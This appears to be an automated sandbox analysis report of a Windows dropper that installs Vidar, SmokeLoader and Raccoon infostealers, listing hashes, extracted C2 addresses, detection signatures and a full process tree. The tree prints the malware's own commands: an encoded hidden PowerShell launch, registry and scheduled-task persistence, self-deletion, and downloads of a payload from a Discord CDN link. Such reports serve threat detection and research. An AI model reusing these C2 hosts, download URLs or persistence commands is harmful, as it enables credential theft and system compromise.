Analysis

  • max time kernel
    93s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    02-10-2021 00:03

General

  • Target

    C7DF63BD3D9DBD3CBD11E02D0CA6F8988251BF5BEA12D.exe

  • Size

    2.6MB

  • MD5

    a1a2a0b423349f463d23969864a111c0

  • SHA1

    37d83a34da50b959759cbb18b01654bbd17bbb3f

  • SHA256

    c7df63bd3d9dbd3cbd11e02d0ca6f8988251bf5bea12d6d76c40ba2d33b5468d

  • SHA512

    3100ef7b7cb3c5887bbf6a8eededee660da6f0744e09943bc1276b9db09baaed7dab299a09ace9ba64c09a17d5a47126b8edd9e21be96d78b2bcd9a434940d2d

Malware Config

Extracted

Family

vidar

Version

39.7

Botnet

933

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

� um@�Y]�����sN)R���B��Jbd~7�4�e�9�{�

Attributes
  • url4cnc

    �cb{K^�WXP�۸��fB:O�ѡԾ"e.�p�tI�'�.��kAd(8����(�G�� �a�@�R����jN �V��N*��

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.1

Botnet

937

C2

https://mas.to/@bardak1ho

Attributes
  • profile_id

    937

Extracted

Family

raccoon

Botnet

�! =A�B_ �����!Os�ܺ��?0yd�f�0F�:�-�

Attributes
  • url4cnc

    �cb{K^�WXP�۸��fB:O�ȼ��/1h �m�p_�|�;�\�~ |"v����h�[��i�a������1S���>����Ѩ�R�P2��@cC

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 7 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 42 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        2⤵
          PID:6964
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1076
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1212
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1204
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1852
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2476
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2708
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2696
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Browser
                        1⤵
                        • Suspicious use of SetThreadContext
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2788
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                          2⤵
                          • Modifies registry class
                          PID:3012
                      • C:\Windows\Explorer.EXE
                        C:\Windows\Explorer.EXE
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2996
                        • C:\Users\Admin\AppData\Local\Temp\C7DF63BD3D9DBD3CBD11E02D0CA6F8988251BF5BEA12D.exe
                          "C:\Users\Admin\AppData\Local\Temp\C7DF63BD3D9DBD3CBD11E02D0CA6F8988251BF5BEA12D.exe"
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:628
                          • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS4728C381\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:876
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1552
                              • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_1.exe
                                sonia_1.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3948
                                • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_1.exe" -a
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4028
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2056
                              • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_2.exe
                                sonia_2.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:2836
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_3.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2176
                              • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_3.exe
                                sonia_3.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks processor information in registry
                                PID:2796
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2336
                              • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_4.exe
                                sonia_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3628
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_5.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2436
                              • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_5.exe
                                sonia_5.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3992
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2652
                              • C:\Users\Admin\AppData\Local\Temp\7zS4728C381\sonia_6.exe
                                sonia_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:3940
                                • C:\Users\Admin\Documents\ylutctbgocV9tGthLSbSBzHl.exe
                                  "C:\Users\Admin\Documents\ylutctbgocV9tGthLSbSBzHl.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4968
                                  • C:\Users\Admin\AppData\Roaming\4258109.scr
                                    "C:\Users\Admin\AppData\Roaming\4258109.scr" /S
                                    7⤵
                                      PID:5240
                                    • C:\Users\Admin\AppData\Roaming\1423037.scr
                                      "C:\Users\Admin\AppData\Roaming\1423037.scr" /S
                                      7⤵
                                        PID:5592
                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                          8⤵
                                            PID:572
                                      • C:\Users\Admin\Documents\wSpmdtKEA840UYQLJyi0ix8k.exe
                                        "C:\Users\Admin\Documents\wSpmdtKEA840UYQLJyi0ix8k.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4928
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                          7⤵
                                            PID:5380
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                              8⤵
                                                PID:5516
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                              7⤵
                                                PID:7136
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x64,0xac,0xd0,0x8,0xd4,0x7fff6fcd4f50,0x7fff6fcd4f60,0x7fff6fcd4f70
                                                  8⤵
                                                    PID:6696
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1480 /prefetch:2
                                                    8⤵
                                                      PID:6740
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1904 /prefetch:8
                                                      8⤵
                                                        PID:4948
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
                                                        8⤵
                                                          PID:4660
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:1
                                                          8⤵
                                                            PID:6900
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                            8⤵
                                                              PID:4432
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
                                                              8⤵
                                                                PID:5132
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2592 /prefetch:1
                                                                8⤵
                                                                  PID:5516
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
                                                                  8⤵
                                                                    PID:4752
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
                                                                    8⤵
                                                                      PID:4460
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,4206890785515444834,261759194323641922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
                                                                      8⤵
                                                                        PID:7392
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /C taskkill /F /PID 4928 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\wSpmdtKEA840UYQLJyi0ix8k.exe"
                                                                      7⤵
                                                                        PID:4468
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /F /PID 4928
                                                                          8⤵
                                                                          • Kills process with taskkill
                                                                          PID:4440
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /C taskkill /F /PID 4928 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\wSpmdtKEA840UYQLJyi0ix8k.exe"
                                                                        7⤵
                                                                          PID:4456
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /F /PID 4928
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:5052
                                                                      • C:\Users\Admin\Documents\3buIDLjSPnhdPt8CMYazwmbc.exe
                                                                        "C:\Users\Admin\Documents\3buIDLjSPnhdPt8CMYazwmbc.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4944
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 3buIDLjSPnhdPt8CMYazwmbc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\3buIDLjSPnhdPt8CMYazwmbc.exe" & del C:\ProgramData\*.dll & exit
                                                                          7⤵
                                                                            PID:6444
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im 3buIDLjSPnhdPt8CMYazwmbc.exe /f
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:6684
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4392
                                                                        • C:\Users\Admin\Documents\BviISoLogkagRaVhup1SIrTx.exe
                                                                          "C:\Users\Admin\Documents\BviISoLogkagRaVhup1SIrTx.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:5012
                                                                        • C:\Users\Admin\Documents\7ADfFrd1a2TXUUDbdc__ercN.exe
                                                                          "C:\Users\Admin\Documents\7ADfFrd1a2TXUUDbdc__ercN.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:4936
                                                                          • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:1428
                                                                          • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4240
                                                                          • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:1320
                                                                            • C:\Users\Admin\AppData\Roaming\1423037.scr
                                                                              "C:\Users\Admin\AppData\Roaming\1423037.scr" /S
                                                                              8⤵
                                                                                PID:5704
                                                                              • C:\Users\Admin\AppData\Roaming\8324590.scr
                                                                                "C:\Users\Admin\AppData\Roaming\8324590.scr" /S
                                                                                8⤵
                                                                                  PID:4256
                                                                                • C:\Users\Admin\AppData\Roaming\3038414.scr
                                                                                  "C:\Users\Admin\AppData\Roaming\3038414.scr" /S
                                                                                  8⤵
                                                                                    PID:4676
                                                                                  • C:\Users\Admin\AppData\Roaming\4522523.scr
                                                                                    "C:\Users\Admin\AppData\Roaming\4522523.scr" /S
                                                                                    8⤵
                                                                                      PID:4696
                                                                                    • C:\Users\Admin\AppData\Roaming\2716856.scr
                                                                                      "C:\Users\Admin\AppData\Roaming\2716856.scr" /S
                                                                                      8⤵
                                                                                        PID:6416
                                                                                  • C:\Users\Admin\Documents\B9viWhflEv5v9v6Y72oK4M79.exe
                                                                                    "C:\Users\Admin\Documents\B9viWhflEv5v9v6Y72oK4M79.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4960
                                                                                    • C:\Users\Admin\Documents\B9viWhflEv5v9v6Y72oK4M79.exe
                                                                                      "C:\Users\Admin\Documents\B9viWhflEv5v9v6Y72oK4M79.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:1824
                                                                                  • C:\Users\Admin\Documents\lvYVi6CjVCaHXRLYQZCPZCO0.exe
                                                                                    "C:\Users\Admin\Documents\lvYVi6CjVCaHXRLYQZCPZCO0.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4976
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 656
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:1536
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 704
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:2960
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 712
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4752
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 668
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:3480
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1076
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5372
                                                                                  • C:\Users\Admin\Documents\F_IO2INa6Avhil9heEDSR8V4.exe
                                                                                    "C:\Users\Admin\Documents\F_IO2INa6Avhil9heEDSR8V4.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4992
                                                                                  • C:\Users\Admin\Documents\Ny2qxVZMts_o4qFmnv5MxEGI.exe
                                                                                    "C:\Users\Admin\Documents\Ny2qxVZMts_o4qFmnv5MxEGI.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5024
                                                                                    • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4040
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                        8⤵
                                                                                          PID:5280
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                            9⤵
                                                                                              PID:5840
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
                                                                                            8⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:5504
                                                                                      • C:\Users\Admin\Documents\A8Wm7EDFHCtGoEQGfSccnm4U.exe
                                                                                        "C:\Users\Admin\Documents\A8Wm7EDFHCtGoEQGfSccnm4U.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:5008
                                                                                      • C:\Users\Admin\Documents\VMCInKFQqkyT3fZ_WZJ19qPg.exe
                                                                                        "C:\Users\Admin\Documents\VMCInKFQqkyT3fZ_WZJ19qPg.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4984
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          7⤵
                                                                                            PID:5136
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2756
                                                                                        • C:\Users\Admin\Documents\lUMLpXon6A3oAmhW2DB7VPAU.exe
                                                                                          "C:\Users\Admin\Documents\lUMLpXon6A3oAmhW2DB7VPAU.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5000
                                                                                        • C:\Users\Admin\Documents\t20mvUlD6hkMf8z1hywo1fOm.exe
                                                                                          "C:\Users\Admin\Documents\t20mvUlD6hkMf8z1hywo1fOm.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4952
                                                                                        • C:\Users\Admin\Documents\BHVXN_20a4rMAl8tQ2QWczMF.exe
                                                                                          "C:\Users\Admin\Documents\BHVXN_20a4rMAl8tQ2QWczMF.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5040
                                                                                        • C:\Users\Admin\Documents\xwkiF8a1z_8V3ZjWgJ2Bflqg.exe
                                                                                          "C:\Users\Admin\Documents\xwkiF8a1z_8V3ZjWgJ2Bflqg.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5032
                                                                                          • C:\Users\Admin\AppData\Roaming\1667226.scr
                                                                                            "C:\Users\Admin\AppData\Roaming\1667226.scr" /S
                                                                                            7⤵
                                                                                              PID:5460
                                                                                            • C:\Users\Admin\AppData\Roaming\7250864.scr
                                                                                              "C:\Users\Admin\AppData\Roaming\7250864.scr" /S
                                                                                              7⤵
                                                                                                PID:5788
                                                                                              • C:\Users\Admin\AppData\Roaming\2016894.scr
                                                                                                "C:\Users\Admin\AppData\Roaming\2016894.scr" /S
                                                                                                7⤵
                                                                                                  PID:5304
                                                                                                • C:\Users\Admin\AppData\Roaming\8796131.scr
                                                                                                  "C:\Users\Admin\AppData\Roaming\8796131.scr" /S
                                                                                                  7⤵
                                                                                                    PID:5928
                                                                                                  • C:\Users\Admin\AppData\Roaming\3230398.scr
                                                                                                    "C:\Users\Admin\AppData\Roaming\3230398.scr" /S
                                                                                                    7⤵
                                                                                                      PID:3096
                                                                                                  • C:\Users\Admin\Documents\0TizW6OCoG7Ibw0F8MHxzDjb.exe
                                                                                                    "C:\Users\Admin\Documents\0TizW6OCoG7Ibw0F8MHxzDjb.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5048
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\9EF7.bat C:\Users\Admin\Documents\0TizW6OCoG7Ibw0F8MHxzDjb.exe"
                                                                                                      7⤵
                                                                                                        PID:4816
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\extd.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                          8⤵
                                                                                                            PID:5564
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\extd.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/893131039881445399/893539047102898247/3.exe" "3.exe" "" "" "" "" "" ""
                                                                                                            8⤵
                                                                                                              PID:4152
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\extd.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\9EF5.tmp\9EF6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/893131039881445399/893539047102898247/3.exe" "3.exe" "" "" "" "" "" ""
                                                                                                              8⤵
                                                                                                                PID:6936
